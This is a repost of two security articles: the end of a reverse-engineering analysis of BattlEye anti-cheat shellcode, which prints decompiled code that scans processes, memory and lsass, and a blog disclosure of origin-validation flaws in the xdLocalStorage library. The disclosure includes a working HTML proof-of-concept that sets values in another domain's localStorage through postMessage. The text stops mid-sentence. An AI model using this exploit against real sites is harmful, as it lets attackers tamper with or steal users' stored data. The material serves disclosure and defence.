QUERY WINDOW STYLE window_style = GetWindowLongA(top_window_handle, GWL_STYLE); extended_window_style = GetWindowLongA(top_window_handle, GWL_EXSTYLE); *(_DWORD *)&report_buffer[after_class_index] = extended_window_style | window_style; // QUERY WINDOW OWNER PROCESS ID GetWindowThreadProcessId(top_window_handle, &window_pid); *(_DWORD *)&report_buffer[after_class_index + 4] = window_pid; buffer_index = after_class_index + 8; } top_window_handle = GetWindow(top_window_handle, GW_HWNDNEXT); } while ( top_window_handle && buffer_index <= 0x4F40 ); battleye::send(report_buffer, buffer_index, false); free(report_buffer); } Shellcode detection [2] Manually mapping an executable is a process of replicating the windows image loader Another mechanism of this proprietary shellcode is the complete address space enumeration done on all processes running. This enumeration routine checks for memory anomalies frequently seen in shellcode and manually mapped portable executables [2]. This is done by enumerating all processes and their respective threads. By checking the start address of each thread and cross-referencing this to known module address ranges, it is possible to deduce which threads were used to execute dynamically allocated shellcode. When such an anomaly is found, the thread start address, thread handle, thread index and thread creation time are all sent to the respective game server for further investigation. This is likely done because allocating code into a trusted process yields increased stealth. This method kind of mitigates it as shellcode stands out if you start threads directly for them. This would not catch anyone using a method such as thread hijacking for shellcode execution, which is an alternative method. The decompilation is as follows: query_buffer_size = 0x150; while ( 1 ) { // QUERY PROCESS LIST query_buffer_size += 0x400; query_buffer = (SYSTEM_PROCESS_INFORMATION *)realloc(query_buffer, query_buffer_size); if ( !query_buffer ) break; query_status = NtQuerySystemInformation( SystemProcessInformation, query_buffer, query_buffer_size, &query_buffer_size); if ( query_status != STATUS_INFO_LENGTH_MISMATCH ) { if ( query_status >= 0 ) { // QUERY MODULE LIST SIZE module_list_size = 0; NtQuerySystemInformation)(SystemModuleInformation, &module_list_size, 0, &module_list_size); modules_buffer = (RTL_PROCESS_MODULES *)realloc(0, module_list_size); if ( modules_buffer ) { // QUERY MODULE LIST if ( NtQuerySystemInformation)( SystemModuleInformation, modules_buffer, module_list_size, 1) >= 0 ) { for ( current_process_entry = query_buffer; current_process_entry->UniqueProcessId != GAME_PROCESS_ID; current_process_entry = (std::uint64_t)current_process_entry + current_process_entry->NextEntryOffset) ) { if ( !current_process_entry->NextEntryOffset ) goto STOP_PROCESS_ITERATION_LABEL; } for ( thread_index = 0; thread_index < current_process_entry->NumberOfThreads; ++thread_index ) { // CHECK IF THREAD IS INSIDE OF ANY KNOWN MODULE for ( module_count = 0; module_count < modules_buffer->NumberOfModules && current_process_entry->threads[thread_index].StartAddress < modules_buffer->Modules[module_count].ImageBase || current_process_entry->threads[thread_index].StartAddress >= (char *)modules_buffer->Modules[module_count].ImageBase + modules_buffer->Modules[module_count].ImageSize); ++module_count ) { ; } if ( module_count == modules_buffer->NumberOfModules )// IF NOT INSIDE OF ANY MODULES, DUMP { // SEND A REPORT ! thread_report.pad = 0; thread_report.id = 0xF; thread_report.thread_base_address = current_process_entry->threads[thread_index].StartAddress; thread_report.thread_handle = current_process_entry->threads[thread_index].ClientId.UniqueThread; thread_report.thread_index = current_process_entry->NumberOfThreads - (thread_index + 1); thread_report.create_time = current_process_entry->threads[thread_index].CreateTime - current_process_entry->CreateTime; thread_report.windows_directory_delta = nullptr; if ( GetWindowsDirectoryA(&directory_path, 0x80) ) { windows_directory_handle = CreateFileA( &directory_path, GENERIC_READ, 7, 0, 3, 0x2000000, 0); if ( windows_directory_handle != INVALID_HANDLE_VALUE ) { if ( GetFileTime(windows_directory_handle, 0, 0, &last_write_time) ) thread_report.windows_directory_delta = last_write_time - current_process_entry->threads[thread_index].CreateTime; CloseHandle(windows_directory_handle); } } thread_report.driver_folder_delta = nullptr; system_directory_length = GetSystemDirectoryA(&directory_path, 128); if ( system_directory_length ) { // Append \\Drivers std::memcpy(&directory_path + system_directory_length, "\\Drivers", 9); driver_folder_handle = CreateFileA(&directory_path, GENERIC_READ, 7, 0i, 3, 0x2000000, 0); if ( driver_folder_handle != INVALID_HANDLE_VALUE ) { if ( GetFileTime(driver_folder_handle, 0, 0, &drivers_folder_last_write_time) ) thread_report.driver_folder_delta = drivers_folder_last_write_time - current_process_entry->threads[thread_index].CreateTime; CloseHandle(driver_folder_handle); } } battleye::send(&thread_report.pad, 0x2A, 0); } } } STOP_PROCESS_ITERATION_LABEL: free(modules_buffer); } free(query_buffer); } break; } } Shellcode dumping The shellcode will also scan the game process and the Windows process lsass.exe for suspicious memory allocations. While the previous memory scan mentioned in the above section looks for general abnormalities in all processes specific to thread creation, this focuses on specific scenarios and even includes a memory region size whitelist, which should be quite trivial to abuse. [1] The Virtual Address Descriptor tree is used by the Windows memory manager to describe memory ranges used by a process as they are allocated. When a process allocates memory with VirutalAlloc, the memory manager creates an entry in the VAD tree. Source The game and lsass process are scanned for executable memory outside of known modules by checking the Type field in MEMORY_BASIC_INFORMATION. This field will be MEM_IMAGE if the memory section is mapped properly by the Windows image loader (Ldr), whereas the field would be MEM_PRIVATE or MEM_MAPPED if allocated by other means. This is actually the proper way to detect shellcode and was implemented in my project MapDetection over three years ago. Thankfully anti-cheats are now up to speed. After this scan is done, a game-specific check has been added which caught my attention. The shellcode will spam IsBadReadPtr on reserved and freed memory, which should always return true as there would normally not be any available memory in these sections. This aims to catch cheaters manually modifying the virtual address descriptor[3] to hide their memory from the anti-cheat. While this is actually a good idea in theory, this kind of spamming is going to hurt performance and IsBadReadPtr is very simple to hook. for ( search_index = 0; ; ++search_index ) { search_count = lsass_handle ? 2 : 1; if ( search_index >= search_count ) break; // SEARCH CURRENT PROCESS BEFORE LSASS if ( search_index ) current_process = lsass_handle; else current_process = -1; // ITERATE ENTIRE ADDRESS SPACE OF PROCESS for ( current_address = 0; NtQueryVirtualMemory)( current_process, current_address, 0, &mem_info, sizeof(mem_info), &used_length) >= 0; current_address = (char *)mem_info.BaseAddress + mem_info.RegionSize ) { // FIND ANY EXECUTABLE MEMORY THAT DOES NOT BELONG TO A MODULE if ( mem_info.State == MEM_COMMIT && (mem_info.Protect == PAGE_EXECUTE || mem_info.Protect == PAGE_EXECUTE_READ || mem_info.Protect == PAGE_EXECUTE_READWRITE) && (mem_info.Type == MEM_PRIVATE || mem_info.Type == MEM_MAPPED) && (mem_info.BaseAddress > SHELLCODE_ADDRESS || mem_info.BaseAddress + mem_info.RegionSize <= SHELLCODE_ADDRESS) ) { report.pad = 0; report.id = 0x10; report.base_address = (__int64)mem_info.BaseAddress; report.region_size = mem_info.RegionSize; report.meta = mem_info.Type | mem_info.Protect | mem_info.State; battleye::send(&report, sizeof(report), 0); if ( !search_index && (mem_info.RegionSize != 0x12000 && mem_info.RegionSize >= 0x11000 && mem_info.RegionSize <= 0x500000 || mem_info.RegionSize == 0x9000 || mem_info.RegionSize == 0x7000 || mem_info.RegionSize >= 0x2000 && mem_info.RegionSize <= 0xF000 && mem_info.Protect == PAGE_EXECUTE_READ)) { // INITIATE RAW DATA PACKET report.pad = 0; report.id = 0xBE; battleye::send(&report, sizeof(report), false); // DUMP SHELLCODE IN CHUNKS OF 0x27EA (WHY?) for ( chunk_index = 0; ; ++chunk_index ) { if ( chunk_index >= mem_info.region_size / 0x27EA + 1 ) break; buffer_size = chunk_index >= mem_info.region_size / 0x27EA ? mem_info.region_size % 0x27EA : 0x27EA; if ( NtReadVirtualMemory(current_process, mem_info.base_address, &report.buffer, buffer_size, 0x00) < 0 ) break; report.pad = 0; report.id = 0xBEu; battleye::send(&v313, buffer_size + 2, false); } } } // TRY TO FIND DKOM'D MEMORY IN LOCAL PROCESS if ( !search_index && (mem_info.State == MEM_COMMIT && (mem_info.Protect == PAGE_NOACCESS || !mem_info.Protect) || mem_info.State == MEM_FREE || mem_info.State == MEM_RESERVE) ) { toggle = 0; for ( scan_address = current_address; scan_address < (char *)mem_info.BaseAddress + mem_info.RegionSize && scan_address < (char *)mem_info.BaseAddress + 0x40000000; scan_address += 0x20000 ) { if ( !IsBadReadPtr(scan_address, 1) && NtQueryVirtualMemory(GetCurrentProcess(), scan_address, 0, &local_mem_info, sizeof(local_mem_info), &used_length) >= 0 && local_mem_info.State == mem_info.State && (local_mem_info.State != 4096 || local_mem_info.Protect == mem_info.Protect) ) { if ( !toggle ) { report.pad = 0; report.id = 0x10; report.base_address = mem_info.BaseAddress; report.region_size = mem_info.RegionSize; report.meta = mem_info.Type | mem_info.Protect | mem_info.State; battleye::send(&report, sizeof(report), 0); toggle = 1; } report.pad = 0; report.id = 0x10; report.base_address = local_mem_info.BaseAddress; report.region_size = local_mem_info.RegionSize; report.meta = local_mem_info.Type | local_mem_info.Protect | local_mem_info.State; battleye::send(&local_mem_info, sizeof(report), 0); } } } } } Handle enumeration This mechanism will enumerate all open handles on the machine and flag any game process handles. This is done to catch cheaters forcing their handles to have a certain level of access that is not normally obtainable, as the anti-cheat registers callbacks to prevent processes from gaining memory-modification rights of the game process. If a process is caught with an open handle to the game process, relevant info, such as level of access and process name, is sent to the game server: report_buffer = (__int8 *)malloc(0x2800); report_buffer[0] = 0; report_buffer[1] = 0x11; buffer_index = 2; handle_info = 0; buffer_size = 0x20; do { buffer_size += 0x400; handle_info = (SYSTEM_HANDLE_INFORMATION *)realloc(handle_info, buffer_size); if ( !handle_info ) break; query_status = NtQuerySystemInformation(0x10, handle_info, buffer_size, &buffer_size);// SystemHandleInformation } while ( query_status == STATUS_INFO_LENGTH_MISMATCH ); if ( handle_info && query_status >= 0 ) { process_object_type_index = -1; for ( handle_index = 0; (unsigned int)handle_index < handle_info->number_of_handles && buffer_index <= 10107; ++handle_index ) { // ONLY FILTER PROCESS HANDLES if ( process_object_type_index == -1 || (unsigned __int8)handle_info->handles[handle_index].ObjectTypeIndex == process_object_type_index ) { // SEE IF OWNING PROCESS IS NOT GAME PROCESS if ( handle_info->handles[handle_index].UniqueProcessId != GetCurrentProcessId() ) { process_handle = OpenProcess( PROCESS_DUP_HANDLE, 0, *(unsigned int *)&handle_info->handles[handle_index].UniqueProcessId); if ( process_handle ) { // DUPLICATE THEIR HANDLE current_process_handle = GetCurrentProcess(); if ( DuplicateHandle( process_handle, (unsigned __int16)handle_info->handles[handle_index].HandleValue, current_process_handle, &duplicated_handle, PROCESS_QUERY_LIMITED_INFORMATION, 0, 0) ) { if ( process_object_type_index == -1 ) { if ( NtQueryObject(duplicated_handle, ObjectTypeInformation, &typeinfo, 0x400, 0) >= 0 && !_wcsnicmp(typeinfo.Buffer, "Process", typeinfo.Length / 2) ) { process_object_type_index = (unsigned __int8)handle_info->handles[handle_index].ObjectTypeIndex; } } if ( process_object_type_index != -1 ) { // DUMP OWNING PROCESS NAME target_process_id = GetProcessId(duplicated_handle); if ( target_process_id == GetCurrentProcessId() ) { if ( handle_info->handles[handle_index].GrantedAccess & PROCESS_VM_READ|PROCESS_VM_WRITE ) { owning_process = OpenProcess( PROCESS_QUERY_LIMITED_INFORMATION, 0, *(unsigned int *)&handle_info->handles[handle_index].UniqueProcessId); process_name_length = 0x80; if ( !owning_process || !QueryFullProcessImageNameA( owning_process, 0, &report_buffer[buffer_index + 1], &process_name_length) ) { process_name_length = 0; } if ( owning_process ) CloseHandle(owning_process); report_buffer[buffer_index] = process_name_length; after_name_index = buffer_index + (char)process_name_length + 1; *(_DWORD *)&report_buffer[after_name_index] = handle_info->handles[handle_index].GrantedAccess; buffer_index = after_name_index + 4; } } } CloseHandle(duplicated_handle); CloseHandle(process_handle); } else { CloseHandle(process_handle); } } } } } } if ( handle_info ) free(handle_info); battleye::send(report_buffer, buffer_index, false); free(report_buffer); Process enumeration The first routine the shellcode implements is a catch-all function for logging and dumping information about all running processes. This is fairly common, but is included in the article for completeness’ sake. This also uploads the file size of the primary image on disk. snapshot_handle = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0x00 ); if ( snapshot_handle != INVALID_HANDLE_VALUE ) { process_entry.dwSize = 0x130; if ( Process32First(snapshot_handle, &process_entry) ) { report_buffer = (std::uint8_t*)malloc(0x5000); report_buffer[0] = 0; report_buffer[1] = 0xB; buffer_index = 2; // ITERATE PROCESSES do { target_process_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, false, process_entry.th32ProcessID); // QUERY PROCESS IAMGE NAME name_length = 0x100; query_result = QueryFullProcessImageNameW(target_process_handle, 0, &name_buffer, &name_length); name_length = WideCharToMultiByte( CP_UTF8, 0x00, &name_buffer, name_length, &report_buffer[buffer_index + 5], 0xFF, nullptr, nullptr); valid_query = target_process_handle && query_result && name_length; // Query file size if ( valid_query ) { if ( GetFileAttributesExW(&name_buffer, GetFileExInfoStandard, &file_attributes) ) file_size = file_attributes.nFileSizeLow; else file_size = 0; } else { // TRY QUERY AGAIN WITHOUT HANDLE process_id_information.process_id = (void *)process_entry.th32ProcessID; process_id_information.image_name.Length = '\0'; process_id_information.image_name.MaximumLength = '\x02\0'; process_id_information.image_name.Buffer = name_buffer; if ( NtQuerySystemInformation(SystemProcessIdInformation, &process_id_information, 24, 1) < 0 ) { name_length = 0; } else { name_address = &report_buffer[buffer_index + 5]; name_length = WideCharToMultiByte( CP_UTF8, 0, (__int64 *)process_id_information.image_name.Buffer, process_id_information.image_name.Length / 2, name_address, 0xFF, nullptr, nullptr); } file_size = 0; } // IF MANUAL QUERY WORKED if ( name_length ) { *(_DWORD *)&report_buffer[buffer_index] = process_entry.th32ProcessID; report_buffer[buffer_index + 4] = name_length; *(_DWORD *)&report_buffer[buffer_index + 5 + name_length] = file_size; buffer_index += name_length + 9; } if ( target_process_handle ) CloseHandle(target_process_handle); // CACHE LSASS HANDLE FOR LATER !! if ( *(_DWORD *)process_entry.szExeFile == 'sasl' ) lsass_handle = OpenProcess(0x410, 0, process_entry.th32ProcessID); } while ( Process32Next(snapshot_handle, &process_entry) && buffer_index < 0x4EFB ); // CLEANUP CloseHandle((__int64)snapshot_handle); battleye::send(report_buffer, buffer_index, 0); free(report_buffer); } } Sursa: https://secret.club/2020/03/31/battleye-developer-tracking.html -
Exploiting xdLocalStorage (localStorage and postMessage) Published by GrimHacker on 2 April 2020 Last updated on 7 April 2020 Some time ago I came across a site that was using xdLocalStorage after I had been looking into the security of HTML5 postMessage. I found that the library had several common security flaws around lack of origin validation and then noticed that there was already an open issue in the project for this problem, added it to my list of things to blog about, and promptly forgot about it. This week I have found the time to actually write this post which I hope will prove useful not only for those using xdLocalStorage, but more generally for those attempting to find (or avoid introducing) vulnerabilities when Web Messaging is in use. Contents Background What is xdLocalStorage? Origin Same Origin HTML5 Web Storage DNS Spoofing Attacks Cross Directory Attacks A note to testers Web Messaging (AKA cross-document messaging AKA postMessage) Receiving a message Sending a message A note to testers The Vulnerability in xdLocalStorage Normal Operation Walk Through Visual Example The Vulnerabilities Missing origin validation when receiving messages Magic iframe – CVE-2015-9544 Client – CVE-2015-9545 Wildcard targetOrigin when sending messages Magic iframe – CVE-2020-11610 Client – CVE-2020-11611 How Wide Spread is the Issue in xdLocalStorage? Defence xdLocalStorage Web Messaging Web Storage Background What is xdLocalStorage? “xdLocalStorage is a lightweight js library which implements LocalStorage interface and support cross domain storage by using iframe post message communication.” [sic] https://github.com/ofirdagan/cross-domain-local-storage/blob/master/README.md This library aims to solve the following problem: “As for now, standard HTML5 Web Storage (a.k.a Local Storage) doesn’t now allow cross domain data sharing. This may be a big problem in an organization which have a lot of sub domains and wants to share client data between them.” [sic] https://github.com/ofirdagan/cross-domain-local-storage/blob/master/README.md Origin “Origins are the fundamental currency of the Web’s security model. Two actors in the Web platform that share an origin are assumed to trust each other and to have the same authority. Actors with differing origins are considered potentially hostile versus each other, and are isolated from each other to varying degrees. For example, if Example Bank’s Web site, hosted at bank.example.com, tries to examine the DOM of Example Charity’s Web site, hosted at charity.example.org, a SecurityError DOMException will be raised.” https://html.spec.whatwg.org/multipage/origin.html Origin may be an “opaque origin” or a “tuple origin”. The former is serialised to “null” and can only meaningfully be tested for equality. A unique opaque origin is assigned to an img, audio, or video element when the data is fetched cross origin. An opaque origin is also used for sandboxed documents, data urls, and potentially in other circumstances. The latter is more commonly encountered and consists of: Scheme (e.g. “http”, “https”, “ftp”, “ws”, etc) Host (e.g. “www.example.com”, “203.0.113.1”, “2001:db8::1”, “localhost”) Port (e.g. 80, 443, or 1234) Domain (e.g. “www.example.com”) [defaults to null] Note “Domain” can usually be ignored to aid understanding, but is included within the specification. Same Origin Two origins, A and B, are said to be same origin if: A and B are the same opaque origin A and B are both tuple origins and their schemes, hosts, and port are identical The following table shows several examples of origins for A and B and indicates if they are the same origin or not: A B same origin https://example.com https://example.com YES http://example.com https://example.com NO http://example.com http://example.com:80 YES https://example.com https://example.com:8443 NO https://example.com https://www.example.com NO http://example.com:8080 http://example.com:8081 NO HTML5 HTML5 was first released in 2008 (and has since been replaced by the “HTML Living Standard”) it introduced a range of new features including “Web Storage” and “Web Messaging”. Web Storage Web storage allows applications to store data locally within the user’s browser as strings in key/value pairs, significantly more data can be stored than in cookies. There are two types: local storage (localStorage) and session storage (sessionStorage). The first stores the data with no expiration whereas the second only stores it for that one session (closing the browser tab loses the data). There are a several security considerations when utilising web storage, as might be expected these are around access to the data. Access to web storage is restricted to the same origin. DNS Spoofing Attacks If an attacker successfully performs a DNS spoofing attack, the user’s browser will connect to the attacker’s web server and treat all responses and content as if it came from the legitimate domain (which has been spoofed). This means that the attacker will then have access to the contents of web storage and can read and manipulate it as the origin will match. In order to prevent this, it is critical that all applications are served over a secure HTTPS connection that utilise valid TLS certificates and HSTS to prevent a connection being established to a malicious server. Cross Directory Attacks Applications that are deployed to different paths within a domain usually have the same origin (i.e. same scheme, domain/host, and port) as each other. This means that JavaScript in one application can manipulate the contents of other applications within the same origin, this is a common concern for Cross Site Scripting vulnerabilities. However what may be overlooked is that sites with the same origin also share the same web storage objects, potentially exposing sensitive data set by one application to an attacker gaining access to another. It is therefore recommended applications deployed in this manner avoid utilising web storage. A note to testers Web storage is read and manipulated via JavaScript functions in the user’s browser, therefore you will not see much evidence of its use in your intercepting proxy (unless you closely review all JavaScript loaded by the application). You can utilise the developer tools in the browser to view the contents of local storage and session storage or use the developer console to execute JavaScript and access the data. For further information about web storage refer to the specification. For further information about using web storage safely refer to the OWASP HTML5 Security Cheat Sheet. Web Messaging (AKA cross-document messaging AKA postMessage) For security and privacy reasons web browsers prevent documents in different origins from affecting each other. This is a critical security feature to prevent malicious sites from reading data from other origin the user may have accessed with the same browser, or executing JavaScript within the context of the other origin. However sometimes an application has a legitimate need to communicate with another application within the user’s browser. For example an organisation may own several domains and need to pass information about the user between them. One technique that was used to achieve this was JSONP which I have blogged about previously. The HTML Standard has introduced a messaging system that allows documents to communicate with each other regardless of their source origin in order to meet this requirement without enabling Cross Site Scripting attacks. Document “A” can create an iframe (or open a window) that contains document “B”. Document “A” can then call the postMessage() method on the Window object of document “B” to trigger a message event and pass information from “A” to “B”. Document “B” can also use the postMessage() method on the window.parent or window.opener object to send a message to the document that opened it (in this example document “A”). Messages can be structured objects, e.g. nested objects and arrays, can contain JavaScript values (String, Number, Date objects, etc), and can contain certain data objects such as File Blob, FileList, and ArrayBuffer objects. I have most commonly seen messages consisting of strings containing JSON. i.e. the sender uses JSON.stringify(data) and the receiver uses data = JSON.parse(event.data). Note that a HTML postMessage is completely different from a HTTP POST message! Note Cross-Origin Resource Sharing (CORS) can also be used to allow a web application running at one origin to access selected resources from a different origin, however that is not the focus of this post. Refer to the article from Mozilla for further information about CORS. Receiving a message In order to receive messages an event handler must be registered for incoming events. For example the addEventListener() method (often on the window) might be used to specify a function which should be called when events of type 'message' are fired. It is the developer’s responsibility to check the origin attribute of any messages received to ensure that they only accept messages from origins they expect. It is not uncommon to encounter message handling functions that are not performing any origin validation at all. However even when origin validation is attempted it is often insufficiently robust. For example (assuming the developer intended to allow messages from https://www.example.com😞 Regular expressions which do not escape the wildcard . character in domain names. e.g. https://wwwXexample.com is a valid domain name that could be registered by an attacker and would pass the following: var regex = /https*:\/\/www.example.com$/i; if regex.test(event.origin) {//accepted} Regular expressions which do not check the string ends by using the $ character at the end of the expression. e.g. https://www.example.com.grimhacker.com is a valid domain that could be under the attacker’s control and pass the following: var regex = /https*:\/\/www\.example\.com/i; if regex.test(event.origin) {//accepted} Using indexOf to verify the origin contains the expected domain name, without accounting for the entire origin (e.g. https://www.example.com.grimhacker.com would pass the following check: if (event.origin.indexOf("https://www.example.com")> -1) {//accepted} Even when robust origin validation is performed, the application must still perform input validation on the data received to ensure it is in the expected format before utilising it. The application must treat the message as data rather than evaluating it as code (e.g. via eval()), and avoid inserting it into the DOM (e.g. via innerHTML). This is because any vulnerability (such as Cross Site Scripting) in an allowed domain may give an attacker the opportunity to send malicious messages from the trusted origin, which may compromise the receiving application. The impact of an a malicious message being processed depends on the vulnerable application’s processing of the data sent, however DOM Based Cross Site Scripting is common. Sending a message When sending a message using the postMessage() method of a window the developer has the option of specifying the targetOrigin of the message either as a parameter or within the object passed in the options parameter; if the targetOrigin is not specified it defaults to / which restricts the message to same origin targets only. It is possible to use the wildcard * to allow any origin to receive the message. It is important to ensure that messages include a specific targetOrigin, particularly when the message contains sensitive information. It may be tempting for developers to use the wildcard if they have created the window object since it is easy to assume that the document within the window must be the one they intend to communicate with, however if the location of that window has changed since it was created the message will be sent to the new location, which may not be an origin which was ever intended. Likewise a developer may be tempted to use the wildcard when sending a message to window.parent, as they believe only legitimate domains can/will be the parent frame/window. This is often not the case and a malicious domain can open a window to the vulnerable application and wait to receive sensitive information via a message. A note to testers Web messages are entirely within the user’s browser, therefore you will not see any evidence of them within your intercepting proxy (unless you closely review all JavaScript loaded by the application). You can check for registered message handlers in the “Global Listeners” section of the debugger pane in the Sources tab of the Chrome developer tools: You can use the monitorEvents() console command in the chrome developer tools to print messages to the console. e.g. to monitor message events sent from or received by the window: monitorEvents(window, "message"). Note that you are likely to miss messages that are sent as soon as the page loads using this method as you will not have had the opportunity to start monitoring. Additionally although this will capture messages sent and received to nested iframes in the same window, it will not capture messages sent to another window. The most robust method I know of for capturing postMessages is the PMHook tool from AppCheck, usage of this tool is described in their Hunting HTML5 postMessage Vulnerabilities paper. Once you have captured the message, are able to reproduce it, and you have found the handler function you will want to use breakpoints in the handler function in order to step through the code and identify issues in the handling of messages. The following resource from Google provides an introduction to using the developer tools in Chrome: https://developers.google.com/web/tools/chrome-devtools/javascript For further information about web messaging refer to the specification. For further information about safely using web messaging refer to the OWASP HTML5 Security Cheat Sheet. For more in depth information regarding finding and exploiting vulnerabilities in web messages I recommend the paper Hunting HTML5 postMessage Vulnerabilities from Sec-1/AppCheck. The Vulnerability in xdLocalStorage Normal Operation Walk Through Normal usage of the xdLocalStorage library (according to the README) is to create a HTML document which imports xdLocalStoragePostMessageApi.min.js on the domain that will store the data – this is the “magical iframe”; and import xdLocalStorage.min.js on the “client page” which needs to manipulate the data. Note angular applications can import ng-xdLocalStorage.min.js and include xdLocalStorage and inject this module where required to use the API. The client The interface is initialised on the client page with the URL of the “magical iframe” after which the setItem(), getItem(), removeItem(), key(), and clear() API functions can be called to interact with the local storage of the domain hosting the “magical iframe”. When the library initialises on the client page it appends an iframe to the body of the page which loads the “magical iframe” document. It also registers an event handler using addEventListener or attachEvent (depending on browser capabilities). The init function is included below (line 56 of xdLocalStorage.js😞 function init(customOptions) { options = XdUtils.extend(customOptions, options); var temp = document.createElement('div'); if (window.addEventListener) { window.addEventListener('message', receiveMessage, false); } else { window.attachEvent('onmessage', receiveMessage); } temp.innerHTML = '<iframe id="' + options.iframeId + '" src="' + options.iframeUrl + '" style="display: none;"></iframe>'; document.body.appendChild(temp); iframe = document.getElementById(options.iframeId); } When the client page calls one of the API functions it must supply any required parameters (e.g. getItem() requires the key name is specified), and a callback function. The API function calls the buildMessage() function passing an appropriate action string for itself, along with the parameters and callback function. The getItem() API function is included below as an example (line 125 of xdLocalStorage.js😞 getItem: function (key, callback) { if (!isApiReady()) { return; } buildMessage('get', key, null, callback); }, The buildMessage() function increments a requestId and stores the callback associated to this requestId. It then creates a data object containing a namespace, the requestId, the action to be performed (e.g. getItem() causes a "get" action), key name, and value. This data is converted to a string and sent as a postMessage to the “magical iframe”. The buildMessage() function is included below (line 43 in xdLocalStorage.js😞 function buildMessage(action, key, value, callback) { requestId++; requests[requestId] = callback; var data = { namespace: MESSAGE_NAMESPACE, id: requestId, action: action, key: key, value: value }; iframe.contentWindow.postMessage(JSON.stringify(data), '*'); } The “magical iframe” When the document is loaded a handler function is attached to the window (using either addEventListener() or attachEvent() depending on browser support) as shown below (line 90 in xdLocalStoragePostMessageApi.js😞 if (window.addEventListener) { window.addEventListener('message', receiveMessage, false); } else { window.attachEvent('onmessage', receiveMessage); } It then sends a message to the parent window to indicate it is ready (line 96 in xdLocalStoragePostMessageApi.js😞 function sendOnLoad() { var data = { namespace: MESSAGE_NAMESPACE, id: 'iframe-ready' }; parent.postMessage(JSON.stringify(data), '*'); } //on creation sendOnLoad(); When a message is received, the browser will call the function that has been registered and pass it the event object. The receiveMessage() function will attempt to parse the event.data attribute as JSON and if successful check if the namespace attribute of the data object matches the configured MESSAGE_NAMESPACE. It will then call the required function based on the value of the data.action attribute, for example "get" results in a call to getData() which is passed the data.key attribute. The receiveMessage() function is included below (line 63 of xdLocalStoragePostMessageApi.js😞 function receiveMessage(event) { var data; try { data = JSON.parse(event.data); } catch (err) { //not our message, can ignore } if (data && data.namespace === MESSAGE_NAMESPACE) { if (data.action === 'set') { setData(data.id, data.key, data.value); } else if (data.action === 'get') { getData(data.id, data.key); } else if (data.action === 'remove') { removeData(data.id, data.key); } else if (data.action === 'key') { getKey(data.id, data.key); } else if (data.action === 'size') { getSize(data.id); } else if (data.action === 'length') { getLength(data.id); } else if (data.action === 'clear') { clear(data.id); } } } The selected function will then directly interact with the localStorage object to carry out the requested action and call the postData() function to send the data back to the parent window. To illustrate this the getData() and postData() functions are shown below (respectively lines 20 and 14 in xdLocalStoragePostMessageApi.js) function getData(id, key) { var value = localStorage.getItem(key); var data = { key: key, value: value }; postData(id, data); } function postData(id, data) { var mergedData = XdUtils.extend(data, defaultData); mergedData.id = id; parent.postMessage(JSON.stringify(mergedData), '*'); } The client When a message is received, the browser will call the function that has been registered and pass it the event object. The receiveMessage() function will attempt to parse the event.data attribute as JSON and if successful check if the namespace attribute of the data object matches the configured MESSAGE_NAMESPACE. If the data.id attribute is "iframe-ready" then the initCallback() function is executed (if one has been configured), otherwise the data object is passed to the applyCallback() function. This is shown below (line 26 of xdLocalStorage.js😞 function receiveMessage(event) { var data; try { data = JSON.parse(event.data); } catch (err) { //not our message, can ignore } if (data && data.namespace === MESSAGE_NAMESPACE) { if (data.id === 'iframe-ready') { iframeReady = true; options.initCallback(); } else { applyCallback(data); } } } The applyCallback() function simply uses the data.id attribute to find the callback function that was stored for the matching requestId and executes it, passing it the data. This is shown below (line 19 of xdLocalStorage.js😞 function applyCallback(data) { if (requests[data.id]) { requests[data.id](data); delete requests[data.id]; } } Visual Example The sequence diagram shows (at a very high level) the interaction between the client (SiteA) and the “magical iframe” (SiteB) when the getItem function is called. The Vulnerabilities Missing origin validation when receiving messages Magic iframe – CVE-2015-9544 The receiveMessage() function in xdLocalStoragePostMessageApi.js does not implement any validation of the origin. The only requirements for the message to be successfully processed are that the message is a string that can be parsed as JSON, the namespace attribute of the message matches the configured MESSAGE_NAMESPACE (default is "cross-domain-local-message"), and the action attribute is one of the following strings: "set", "get", "remove", "key", "size", "length", or "clear". Therefore a malicious domain can send a message that meets these requirements and manipulate the local storage of the domain. In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate site hosting the “magical iframe”. The following proof of concept allows the user to set a value for “pockey” in the local storage of the domain hosting the vulnerable “magic iframe”. However it would also be possible to retrieve all information from local storage and send this to the attacker, by exploiting this issue in combination with the use of a wildcard targetOrigin (discussed below). <html> <!-- POC exploit for xdLocalStorage.js by GrimHacker https://grimhacker.com/exploiting-xdlocalstorage-(localstorage-and-postmessage) --> <body> <script> var MESSAGE_NAMESPACE = "cross-domain-local-message"; var targetSite = "http://siteb.grimhacker.com:8000/cross-domain-local-storage.html" // magical iframe; var iframeId = "vulnerablesite"; var a = document.createElement("a"); a.href = targetSite; var targetOrigin = a.origin; function receiveMessage(event) { var data; data = JSON.parse(event.data); var message = document.getElementById("message"); message.textContent = "My Origin: " + window.origin + "\r\nevent.origin: " + event.origin + "\r\nevent.data: " + event.data; } window.addEventListener('message', receiveMessage, false); var temp = document.createElement('div'); temp.innerHTML = '<iframe id="' + iframeId + '" src="' + targetSite + '" style="display: none;"></iframe>'; document.body.appendChild(temp); iframe = document.getElementById(iframeId); function setValue() { var valueInput = document.getElementById("valueInput"); var data = { namespace: MESSAGE_NAMESPACE, id: 1, action: "set", key: "pockey", value: valueInput.value } iframe.contentWindow.postMessage(JSON.stringify(data), targetOrigin); } </script> <div class=label>Enter a value to assign to "pockey" on the vulnerable target:</div><input id=valueInput></div> <button onclick=setValue()>Set pockey</button> <div><p>The latest postmessage received will be shown below:</div> <div id="message" style="white-space: pre;"></div> </body> </html> The screenshots below demonstrate this: SiteA loads an iframe for cross-domain-local-storage.html on SiteB and receives an “iframe-ready” postMessage. SiteA sends a postMessage to the SiteB iframe to set the key “pockey” with the specified value “pocvalue” in the SiteB local storage. SiteB sends a postMessage to SiteA to indicate success. Checking the localstorage for SiteB shows the key and value have been set. Depending on how the local storage data is used by legitimate client application, altering the data as shown above may impact the security of the client application. Client – CVE-2015-9545 The receiveMessage() function in xdLocalStorage.js does not implement any validation of the origin. The only requirements for the message to be successfully processed are that the message is a string that can be parsed as JSON, the data.namespace attribute of the message matches the configured MESSAGE_NAMESPACE (default is "cross-domain-local-message"), and the data.id attribute of the message matches a requestId that is currently pending. Therefore a malicious domain can send a message that meets these requirements and cause their malicious data to be processed by the callback configured by the vulnerable application. Note that requestId is a number that increments with each legitimate request the vulnerable application sends to the 